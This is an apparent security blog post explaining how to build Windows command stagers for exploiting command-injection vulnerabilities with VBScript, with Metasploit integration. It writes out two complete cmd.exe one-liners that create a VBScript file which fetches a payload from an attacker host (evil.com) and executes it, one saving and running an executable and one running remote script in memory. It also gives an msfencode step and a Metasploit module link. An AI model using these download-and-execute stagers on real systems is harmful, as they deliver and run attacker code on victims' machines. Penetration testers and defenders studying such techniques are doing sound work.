Command stagers in Windows


Update: these command stagers have been integrated into metasploit

Command injection/execution bugs are a relatively common vulnerability. For example, Internet Explorer, Google Chrome, and Mozilla Firefox have all had these problems, at least including common add-ons. (see http://www.securityfocus.com/archive/1/archive/1/499570/100/0/threaded, http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-5045, etc.) Many server-side scripts in webapps also suffer from the same issues.

Against a Linux target, many exploitation possibilities abound, from staging a payload via curl or wget, throwing up a shell via perl or ruby, or launching a double-reverse shell via telnet. Many of these have been implemented in Metasploit, even providing a number of encoders to obfuscate or avoid bad characters. But on Windows, telnet won't work, and the other programs usually are not present. ReL1K presented on using powershell to provide many different payload and stager options on Windows, but it isn't present by default on many Windows installations either. The TFTP and FTP commands are an option, but firewalls usually stop them from functioning. Vbscript support on the other hand, is present by default on all Windows versions from Windows 98 and NT 4 all the way to 7 and server 2008r2. So I prefer using a vbscript download/execute command line, which has also recently been incorporated into Metasploit. To launch a vbscript file from a command line, a vbscript file needs to be executed, so the command needs to create the file, then launch it. The completed command looks like this:

cmd.exe /q /c echo Set F=CreateObject("Microsoft.XMLHTTP") >e.vbs&echo F.Open "GET","https://evil.com/evil.exe",False >>e.vbs&echo F.Send >>e.vbs&echo Set IA=CreateObject("ADODB.Stream") >>e.vbs&echo IA.Type=1 >>e.vbs&echo IA.Open >>e.vbs&echo IA.Write F.responseBody >>e.vbs&echo IA.SaveToFile "%tmp%cj.exe",2 >>e.vbs&echo CreateObject("WScript.Shell").Run "%tmp%cj.exe" >>e.vbs&echo CreateObject("Scripting.FileSystemObject").DeleteFile "e.vbs" >>e.vbs&start e.vbs

The only problem is that the command is long. It's not too long for cmd.exe or windows API calls, but some other programs have limits of 256 characters or less, and this command won't work. The solution is to use a vbs stager; about half the command length can be cut by simply downloading and executing a vbscript file in memory:

cmd /q /c echo Set x=CreateObject("Microsoft.XMLHTTP") >v.vbs&echo x.Open "GET","http://www.evil.com/evil.vbs",False >>v.vbs&echo x.Send >>v.vbs&echo Execute x.responseText >>v.vbs&start v.vbs

Now all you have to do is take your payload, encode it as a vbs,

msfencode -t vbs -o evil.vbs

and your complete exploit is ready. When run, your exploit will create and run a .vbs file that will then download and execute the payload vbs in memory, which will extract, write, and run an executable file containing the binary payload.

Integrate into metasploit by putting this file: http://scriptjunkie1.110mb.com/security/download_eval_vbs.rb into your msf3/modules/payloads/singles/cmd/windows directory.

, , , , , , ,

Comments are closed.